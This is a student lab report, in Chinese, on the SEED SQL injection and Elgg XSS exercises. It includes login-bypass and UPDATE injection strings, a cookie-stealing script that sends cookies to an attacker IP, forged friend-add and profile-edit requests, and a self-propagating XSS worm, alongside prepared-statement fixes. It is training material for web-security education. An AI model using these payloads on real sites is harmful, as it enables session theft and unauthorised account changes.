20232820 2023-2024-2 《网络攻防实践》实践十报告
1.实践内容
SEED SQL注入攻击与防御实验
- 熟悉SQL语句
- 对SELECT语句的SQL注入攻击
- 对UPDATE语句的SQL注入攻击
- SQL对抗
SEED XSS跨站脚本攻击实验(Elgg) - 发布恶意消息,显示警报窗口
- 弹窗显示cookie信息
- 窃取受害者的cookies
- 成为受害者的朋友
- 修改受害者的信息
- 编写XSS蠕虫
- 对抗XSS攻击
2.实践过程
2.1、SEED SQL注入攻击与防御实验
熟悉SQL语句:首先输入指令mysql -u root -p
用户名:root
密码:seedubuntu
登录后,首先输入指令show databases;
来查看这个数据库中有哪些具体的库
接下来指定一个库,输入指令user Users;
查看Users库中有哪些具体的表,使用命令show tables;
可以看到credential表,输入指令select * from credential;
查看表中所有的数据
对SELECT语句的SQL注入攻击:
首先登录www.seedlabsqlinject.com网址,得到sql实验平台
查看代码,发现使用get访问 了unsafe_home.php
我们检查一下unsafe_home.php的相关代码,输入指令vim /var/www/SQLInjection/unsafe_home.php
首先检查Session确认是否已登录,其次和Users数据库建立连接,并从credential表中查找用户输入的用户名和密码组合是否存在。
如果用户为Admin,则会输出所有用户的信息
构造Admin’#,代入 $input_uname ,这样会使得#后的为注释将不再进行查询,只查询了名字而没有密码。
点击Login发现可以直接进入
我们输入用户名Alice’#登入Alice的账户
对UPDATE语句的SQL注入攻击:
首先点击“Edit Profile”
输入指令vim /var/www/SQLInjection/unsafe_edit_backend.php
查看unsafe_edit_backend.php
我们要注入的SQL语句为:
UPDATE credential SET nickname='$input_nickname',email='$input_email',address='$input_address', Password='$hashed_pwd', PhoneNumber='$input_phonenumber' WHERE ID=$id;
在 NickName 一栏输入’, salary=‘2820’ where Name=‘Alice’;#
成功修改Alice的工资金额为2820
SQL对抗:
对于对SELECT语句的SQL注入攻击,将SELECT语句修改为
$sql = $conn->prepare("SELECT id, name, eid, salary, birth, ssn, phoneNumber, address, email,nickname,Password FROM credential WHERE name= ? and Password= ?;");
$sql->bind_param("ss", $input_uname, $hashed_pwd);
对于对UPDATE语句的SQL注入攻击,对UPDATE语句的SQL注入攻击将update更新语句修改为
if($input_pwd!=''){
$hashed_pwd = sha1($input_pwd);
$_SESSION['pwd']=$hashed_pwd;
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,Password=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("sssss", $input_nickname, $input_email, $input_address, $hashed_pwd, $input_phonenumber);
}else{
// if passowrd field is empty.
$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");
$sql->bind_param("ssss", $input_nickname, $input_email, $input_address, $input_phonenumber);
}
2.2、SEED XSS跨站脚本攻击实验(Elgg)
发布恶意消息,显示警报窗口:
我们访问http://www.xsslabelgg.com/,使用Alice的身份登录。
用户名:Alice
密码:seedalice、
点击“Edit Profile”,然后在“Brief description”中输入:<script>alert("xss");</script>
可以看到弹出xss窗口,xss攻击成功
弹窗显示cookie信息:
可以将攻击改的更复杂,我们将攻击代码改成<script>alert(document.cookie);</script>,
其中document.cookie是当前已登录网页的cookie信息。
可以看到弹窗显示cookie信息
窃取受害者的cookies:
首先查看本机IP为192.168.200.2
我们将写入攻击代码<script>document.write('<img src=http://192.168.200.2:2820?c='+escape(document.cookie) + ' >');</script>
输入指令:nc -l 2820 -v
进行监听
保存后可以看到已经拦截了cookie信息
成为受害者的朋友:
将以下代码写入Alice的about me中
<p><script type="text/javascript">window.onload = function () {
var Ajax = null;
var ts = "&__elgg_ts=" + elgg.security.token.__elgg_ts;
var token = "&__elgg_token=" + elgg.security.token.__elgg_token;
var sendurl = "http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token;
Ajax = new XMLHttpRequest();
Ajax.open("GET", sendurl, true);
Ajax.setRequestHeader("Host", "www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
Ajax.send();
}</script></p>
登录Boby账号,首先确认Boby此时没有加Alice好友,然后在成员中访问Alice主页,再通过左上角返回自己的profile,即可发现已添加Alice为好友。
修改受害者的信息:
将以下代码写入Alice的about me中
<script type="text/javascript">
window.onload = function(){
var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
var content= token + ts + "name=" + userName + "&description=<p>hhh,20232831ysc is here!</p>&accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
var samyGuid=44;
if(elgg.session.user.guid!=samyGuid)
{
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>
登录Boby账号,首先确认Boby的profile为空,然后在成员中访问Alice主页,再通过左上角返回Boby的主页,即可发现Boby的About me已经被修改。
编写XSS蠕虫。
将以下代码写入Alice的about me中
<script id="worm" type="text/javascript">
window.onload = function(){
var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
var jsCode = document.getElementById("worm").innerHTML;
var tailTag = "</" + "script>";
var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);
var userName=elgg.session.user.name;
var guid="&guid="+elgg.session.user.guid;
var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
var token="&__elgg_token="+elgg.security.token.__elgg_token;
//Construct the content of your url.
var content= token + ts + "&name=" + userName + "&description=<p>this page had been changed by xss attack again "+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
alert(content)
var aliceGuid=44;
if(elgg.session.user.guid!=aliceGuid){
var Ajax=null;
Ajax=new XMLHttpRequest();
Ajax.open("POST",sendurl,true);
Ajax.setRequestHeader("Host","www.xsslabelgg.com");
Ajax.setRequestHeader("Content-Type",
"application/x-www-form-urlencoded");
Ajax.send(content);
}
}
</script>
登录Boby账号,首先确认Boby的profile情况,然后在成员中访问Alice主页,再通过左上角返回Boby的主页,即可发现Boby的About me已经被修改。
登录Admin账号,首先确认Admin的profile情况,然后在成员中访问Boby主页,再通过左上角返回Admin的主页,即可发现Admin的About me已经被修改。
对抗XSS攻击。
在Admin账号下,点击"Account->administration->plugins,找到HTMLawed,设为 Deactivate 状态
登录Boby账户,发现蠕虫代码已被显示
3.学习中遇到的问题及解决
- 问题1:在about me中写入代码后没反应
- 问题1解决方案:点击右上角的edit HTML后重新查看,成功!
4.实践总结
通过本次实验我进一步了解了web应用程序安全,学习了sql和xss相关知识。不仅局限于理论内容,同时提高了动手实践能力,让我受益匪浅。我仍会继续学习,提高自己的动手能力。
参考资料
- 诸葛建伟. 网络攻防技术与实践[M]. 电子工业出版社, 2011-6.